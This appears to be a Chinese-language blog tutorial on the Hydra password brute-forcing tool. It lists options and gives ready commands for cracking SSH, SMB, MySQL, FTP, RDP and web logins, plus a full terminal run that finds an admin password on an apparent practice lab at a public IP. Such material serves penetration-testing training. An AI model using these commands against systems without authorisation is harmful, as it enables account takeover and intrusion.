Hydra工具使用

tmx8911
8
2025-06-16

Hydra是一款非常强大的暴力破解工具,它是由著名的黑客组织THC开发的一款开源暴力破解工具。Hydra是一个验证性质的工具,主要目的是:展示安全研究人员从远程获取一个系统认证权限。

目前该工具支持以下协议的爆破:

AFP,Cisco AAA,Cisco身份验证,Cisco启用,CVS,Firebird,FTP,HTTP-FORM-GET,HTTP-FORM-POST,HTTP-GET,HTTP-HEAD,HTTP-PROXY,HTTPS-FORM- GET,HTTPS-FORM-POST,HTTPS-GET,HTTPS-HEAD,HTTP-Proxy,ICQ,IMAP,IRC,LDAP,MS-SQL,MYSQL,NCP,NNTP,Oracle Listener,Oracle SID,Oracle,PC-Anywhere, PCNFS,POP3,POSTGRES,RDP,Rexec,Rlogin,Rsh,SAP / R3,SIP,SMB,SMTP,SMTP枚举,SNMP,SOCKS5,SSH(v1和v2),Subversion,Teamspeak(TS2),Telnet,VMware-Auth ,VNC和XMPP。

二、常用的命令:

-l	login	指定破解的用户名称,对特定的用户进行破解;
-L	file	从文件中加载用户名进行破解;
-p 	pass	小写p指定密码破解,少用.一般是采用密码字典;
-P	file	大写字母P,指定密码字典;
-e	nsr 	可选项,n:空密码试探,s:使用指定用户和密码试探。r:指定密码与用户名相反;
-C	file	使用冒号分割格式,例如"登录名:密码"来代替-L/-P参数;
-t	TASKS	同时运行的连接的线程数,每一台主机默认为16;
-M	file	指定服务器目标列表文件一行一条;
-w	time	设置最大超时的时间,单位秒.默认是30s;
-o	file	指定结果输出文件;
-f	在使用-M参数以后,找到第一对登录名或者密码的时候中止玻解;
-v / -V		显示详细过程;
-R	继续从上一次进度接着破解;
-S	采用SSL链接;
-s 	PORT	可通过这个参数指定非默认端口;
-U	服务模块使用细节
-h	更多的命令行选项(完整的帮助)
server		目标服务名称或者IP(使用这个或-M选项)
service		指定服务名,支持的殷务和协议:telnet ftp pop3[-ntlm] imap[-ntlm] smb smbnt http[s]-{head|get} http-{get|post}-form http-proxy cisco cisco-enable vnc ldap3 mssql
mysql oracle-listener postgres nntp socks5 rexec rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh2
smtp-auth[-ntlm] pcanywhere teamspeak sip vmauthd firebird ncp afp等等
OPT		一些服务模块支持额外的输入:(-U用于模块的帮助)

三、工具利用:

1.破解SSH:

hydra -L user.txt -P passwd.txt -o ssh.txt -vV -t 5 101.201.119.x ssh
#-L指定用户字典 -P 指定密码字典  -o把成功的输出到ssh.txt文件 -vV显示详细信息 -t同时运行的连接的线程数

发现爆破成功!

打开ssh.txt文件

四、实例演示:

(1)windows密码破解

SMB服务很稳定,跑得快,不容易ban掉IP

smb://ip 是指 Server Message Block (SMB) 协议。这是一种用于在计算机网络上共享文件、打印机和其他资源的通信协议。在许多操作系统中,包括 Windows、Linux 和 macOS,SMB 都是用于文件共享的主要协议之一。通过 SMB,用户可以在网络上轻松地访问和共享文件夹、文件和打印

hydra -l 用户名 -p 密码 smb://ip -v	#显示爆破详细信息
hydra -L用户名 -P 密码 smb ip -v//-v #显示爆破详细信息

(2)MySQL密码破解

数据库-般会提供-个默认的帐户:SQLServer的sa用户,MySQL的root用户,Oracle的System用户 等

假如我们现在破解mysqL数据库:

hydra -L user.txt -P pass.txt ip mysql

hydra -L user.txt -P pass.txt mysql://目标IP:mysql端口号

(3)ssh密码破解

hydra -l 用户名 -P 密码字典 -t 线程 -vV -e nsr ip ssh
hydra -l 用户名 -P 密码字典 -t 线程 -o save.log -vV ip ssh

(4)破解ftp

hydra ip ftp -l 用户名 -P 密码字典 -t 线程数 -vV

如果你发现目标p并不是在21端口,而是在其他端口上,可以使用-s参数指定正确的端口,其他服务同样如此。

(5)破解rdp

如果不支持rdp模块,尝试升级一下apt install hydra

hydra ip rdp -l administrator -P pass.txt -V

(6)破解https

hydra -m /index.php -l muts -P pass.txt ip https

(7)get方式提交 破解web登录

hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip http-get/web/

(8)post方式提交 破解web登录

hydra -l admin -P small.txt 域名/ip -s 端口 http-post-form "/Pass-09/index.php:username=^USER^&password=^PASS^&Login=Login:F=密码错误"-v

F表示错误信息,根据实际情况填写

hydra -L user.txt -P password.txt 101.201.119.105 -s 9060 http-post-form "/vul/burteforce/bf_form.php:username=^USER^&password=^PASS^&submit=Login:username or password is not exists~" -f  -o post.txt -vV
┌──(kali㉿kali-2023-4)-[~/Desktop]
└─$ hydra -L user.txt -P password.txt 101.201.119.105 -s 9060 http-post-form "/vul/burteforce/bf_form.php:username=^USER^&password=^PASS^&submit=Login:username or password is not exists~" -f  -o post.txt -vV
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-04-20 00:03:50
[DATA] max 16 tasks per 1 server, overall 16 tasks, 285 login tries (l:19/p:15), ~18 tries per task
[DATA] attacking http-post-form://101.201.119.105:9060/vul/burteforce/bf_form.php:username=^USER^&password=^PASS^&submit=Login:username or password is not exists~
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[ATTEMPT] target 101.201.119.105 - login "admin" - pass "1234" - 1 of 285 [child 0] (0/0)
[ATTEMPT] target 101.201.119.105 - login "admin" - pass "123456" - 2 of 285 [child 1] (0/0)
[ATTEMPT] target 101.201.119.105 - login "admin" - pass "pikachu" - 3 of 285 [child 2] (0/0)
[ATTEMPT] target 101.201.119.105 - login "admin" - pass "0000000" - 4 of 285 [child 3] (0/0)
[ATTEMPT] target 101.201.119.105 - login "admin" - pass "root" - 5 of 285 [child 4] (0/0)
[ATTEMPT] target 101.201.119.105 - login "admin" - pass "kali" - 6 of 285 [child 5] (0/0)
[ATTEMPT] target 101.201.119.105 - login "admin" - pass "abc12" - 7 of 285 [child 6] (0/0)
[ATTEMPT] target 101.201.119.105 - login "admin" - pass "adbc214" - 8 of 285 [child 7] (0/0)
[ATTEMPT] target 101.201.119.105 - login "admin" - pass "abc123" - 9 of 285 [child 8] (0/0)
[ATTEMPT] target 101.201.119.105 - login "admin" - pass "Tmx891100!@#" - 10 of 285 [child 9] (0/0)
[ATTEMPT] target 101.201.119.105 - login "admin" - pass "sdlv" - 11 of 285 [child 10] (0/0)
[ATTEMPT] target 101.201.119.105 - login "admin" - pass "ahsdh" - 12 of 285 [child 11] (0/0)
[ATTEMPT] target 101.201.119.105 - login "admin" - pass "ssh" - 13 of 285 [child 12] (0/0)
[ATTEMPT] target 101.201.119.105 - login "admin" - pass "sjf" - 14 of 285 [child 13] (0/0)
[ATTEMPT] target 101.201.119.105 - login "admin" - pass "tmx8911!@#" - 15 of 285 [child 14] (0/0)
[ATTEMPT] target 101.201.119.105 - login "amdin1432431" - pass "1234" - 16 of 285 [child 15] (0/0)
[9060][http-post-form] host: 101.201.119.105   login: admin   password: 123456
[STATUS] attack finished for 101.201.119.105 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-04-20 00:03:50

爆破成功

可参考:https://blog.csdn.net/wutiangui/article/details/134215389

动物装饰